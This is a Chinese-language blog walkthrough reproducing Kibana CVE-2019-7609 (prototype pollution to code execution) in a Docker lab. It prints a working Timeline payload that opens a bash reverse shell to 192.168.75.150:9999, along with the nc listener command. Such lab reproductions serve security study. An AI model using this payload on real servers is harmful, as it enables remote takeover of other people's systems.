2. 程式人生 > 其它 >Kibana 原型鏈汙染導致任意程式碼執行漏洞 (CVE-2019-7609)

Kibana 原型鏈汙染導致任意程式碼執行漏洞 (CVE-2019-7609)

阿新 發佈:2022-05-17

Kibana 為 Elassticsearch 設計的一款開源的檢視工具。其5.6.15和6.6.1之前的版本中存在一處原型鏈汙染漏洞,利用這個漏洞我們可以在目標伺服器上執行任意JavaScript程式碼。

參考連結:

漏洞環境

啟動環境前,需要先在Docker主機上執行如下命令,修改vm.max_map_count

配置為262144:

sysctl -w vm.max_map_count=262144

之後,執行如下命令啟動Kibana 6.5.4和Elasticsearch 6.8.6:

docker-compose up -d

環境啟動後,訪問http://your-ip:5601即可看到Kibana頁面。

漏洞復現

原型鏈汙染髮生在“Timeline”頁面,我們填入如下Payload:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/192.168.75.150/9999 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

開啟監聽

nc -lvvp 9999

輸入Payload

訪問Canvas模組觸發漏洞

反彈Shell成功

相關推薦

Kibana 原型汙染導致任意程式碼執行漏洞 (CVE-2019-7609)

Kibana 為 Elassticsearch 設計的一款開源的檢視工具。其5.6.15和6.6.1之前的版本中存在一處原型汙染漏洞,利用這個漏洞我們可以在目標伺服器上執行任意JavaScript程式碼

Struts2 S2-059 遠端程式碼執行漏洞(CVE-2019-0230)

Apache Struts框架, 會對某些特定的標籤的屬性值,比如id屬性進行二次解析,所以攻擊者可以傳遞將在呈現標籤屬性時再次解析的OGNL表示式,造成OGNL表示式注入。從而可能造成遠端執行程式碼

Struts2 devMode導致遠端程式碼執行漏洞

轉載自https://blog.csdn.net/qq_29277155/article/details/51959041 簡介 Struts 2具有一個稱為devMode(=開發模式)的設定(可以在struts.properties中將其設定為true或false)。啟用此設定後,Struts 2將提供其他

ECShop 2.x/3.x SQL注入/任意程式碼執行漏洞

ECShop 2.x/3.x SQL注入/任意程式碼執行漏洞 ECShop 2.x/3.x SQL注入/任意程式碼執行漏洞

Apache Log4j 任意程式碼執行漏洞

安全風險通告 第1章 安全通告 近日,相關機構監測到 Apache Log4j 存在任意程式碼執行漏洞,經過分析,該元件存在 Java JNDI 注入漏洞,當程式將使用者輸入的資料進行日誌,即可觸發此漏洞,成功利用此漏洞可以在目

Apache Log4j任意程式碼執行漏洞修復 spring-boot-starter-log4j2

1、概述 專案使用log4j 1.2.17結合spring-boot-starter-log4j2進行日誌記錄,針對log4j漏洞進行修復

ThinkPHP(5.0.23-rce)任意程式碼執行漏洞復現及原理

漏洞詳情: 攻擊者可向快取檔案內寫入PHP程式碼導致遠端程式碼執行。根據漏洞利用能得出通過s引數傳遞具體的路由。參考http://blog.nsfocus.net/thinkphp-full-version-rce-vulnerability-analysis/?tdsourcetag=s

漏洞預警 | Apache Struts2 曝任意程式碼執行漏洞 (S2-045,CVE-2017-5638)

FreeBuf上次曝Struts 2的漏洞已經是半年多以前的事情了。 這次的漏洞又是個RCE遠端程式碼執行漏洞。簡單來說,基於Jakarta Multipart解析器進行檔案上傳時,利用漏洞可進行遠端程式碼執行。該漏洞由安恆資訊Nike Zhe

Weblogic遠端程式碼執行漏洞(CVE-2020-14645)

簡介 WebLogic是美國Oracle公司出品的一個application server,確切的說是一個基於JAVAEE架構的中介軟體,WebLogic是用於開發、整合、部署和管理大型分散式Web應用、網路應用和資料庫應用的Java應用伺服器。

Apache Struts 遠端程式碼執行漏洞(CVE-2016-3081)

漏洞簡介 漏洞描述 Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code

ForgeRock AM遠端程式碼執行漏洞 CVE-2021-35464 漏洞復現

參考連結:https://nosec.org/home/detail/4783.html、https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464

Apache log4j2 遠端程式碼執行漏洞 (CVE-2021-44228)

漏洞詳情 漏洞名稱:Apache log4j2 遠端程式碼執行漏洞 (CVE-2021-44832) 漏洞標籤:存在EXP

linux Samba遠端程式碼執行漏洞(CVE-2017-7494)復現

一、漏洞介紹   Samba實現Windows主機與Linux伺服器之間的資源共享,Linux作業系統提供了Samba服務,Samba服務為兩種不同的作業系統架起了一座橋樑,使Linux系統和Windows系統之間能夠實現互相通訊。samba在linux系

TP-LINK 遠端程式碼執行漏洞 CVE-2017-13772 趣談

原文地址:《A CURIOUS TALE OF REMOTE CODE EXECUTION, THE TP-LINK STORY – CVE-2017-13772》 譯者:hello1900@知道創宇404實驗室

Apache ActiveMQ 遠端程式碼執行漏洞 (CVE-2016-3088)分析

作者:知道創宇404實驗室 發表時間:2017年7月7日 1. 背景概述 ActiveMQ 是 Apache 軟體基金會下的一個開源訊息驅動中介軟體軟體。Jetty 是一個開源的 servlet 容器,它為基於 Java 的 web 容器,例如 JSP 和 servle

Openfire Admin Console SSRF&任意檔案讀取漏洞 CVE-2019-18394 CVE-2019-18393 poc

Openfire(以前稱為Wildfire和Jive Messenger)是一個即時通訊(IM)和群聊伺服器,它使用Java編寫的XMPP伺服器,並以Apache License 2.0釋出。

Nodejs-原型汙染

原型汙染 javascript 原型 在javascript中,繼承的整個過程就稱為該類的原型

【web安全】Nodejs原型汙染分析

Nodejs原型汙染分析 什麼是js原型? 可以將js原型理解為其他OOP語言中的類,但還是有細微區別。

CVE-2020-10977-GITLAB CE/EE 任意檔案讀取導致遠端命令執行漏洞-環境搭建及完整復現圖文詳細筆記

漏洞環境搭建-CENTOS7 1.安裝依賴軟體 yum -y install policycoreutils openssh-server openssh-clients postfix

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現 漏洞介紹 F5 BIG-IP 是美國 F5 公司的一款集成了網路流量管理、應用程式安全管理、負載均衡等功能的應用交付平臺。